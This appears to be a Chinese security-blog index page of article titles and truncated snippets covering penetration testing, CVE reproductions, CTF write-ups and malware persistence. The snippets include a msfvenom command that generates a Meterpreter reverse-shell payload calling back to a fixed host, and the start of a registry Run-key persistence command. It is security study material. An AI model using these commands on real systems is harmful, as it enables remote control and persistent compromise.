免费&进群云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖...
ExposureAI(07)一暴露面管理如何支撑渗透测试的实战化、常态化?
——ExposureAI(07)——暴露面管理如何支撑渗透测试的“实战化、常态化”?PART 1概述渗透测试的技术要求与操作流程均较复杂。在常规的渗透测试业务中,大部分工作都是由“人工+工具”的方式完...
Windows和Linux恶意软件持久化常见方法
Windows1. 注册表启动运行说明: 在注册表中设置一个当系统启动时自动执行恶意软件的键值对。Set-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindo...
edu实战SQL注入九连杀 (一)
免责声明: 该教程仅用于网络安全学习,如有人利用该技术从事违法犯罪行为一切和作者无关,请各位遵守法律法规!可以转发,禁止直接复制粘贴!文末赠送五大EDU证书站资产~欢迎各位表哥转发推文!先看成果以下漏...
记一次跨目录上传+任意文件读取rce记录
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后...
Meterpreter源码分析
一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...
【HackTheBox系列】第六篇:中等难度之StreamIO(mssql注入、bloodhound、laps)
一、信息搜集题目提示如下:StreamIO is a medium machine that covers subdomain&n...
【漏洞复现】CVE-2023-41362 MyBB远程代码执行漏洞(后台RCE)
之前的一篇文章提到过后台模版可能导致RCE的内容alicy,公众号:信安百科MyBB <= 1.8.31:SQL注入漏洞利用0x00 前言MyBB是一个基于 PHP+MySQL 搭建,功能强大,...
【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升
0x00 前言Ubuntu是一种基于Linux操作系统的自由软件,它以用户友好的界面和易用性而著称。0x01 漏洞描述Ubuntu OverlayFS 模块中已发现两个权限提升漏洞,漏洞源于 Ubun...
【漏洞复现】用友GRP-U8 SQL注入漏洞
0x01 免责声明请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负...
Proving Grounds Practice-zino
前言在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接:https:/...
漏洞复现:用友GRP-U8 bx_historyDataCheck.jsp SQL注入
前言:漏洞poc均来自互联网已公开请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者...
5577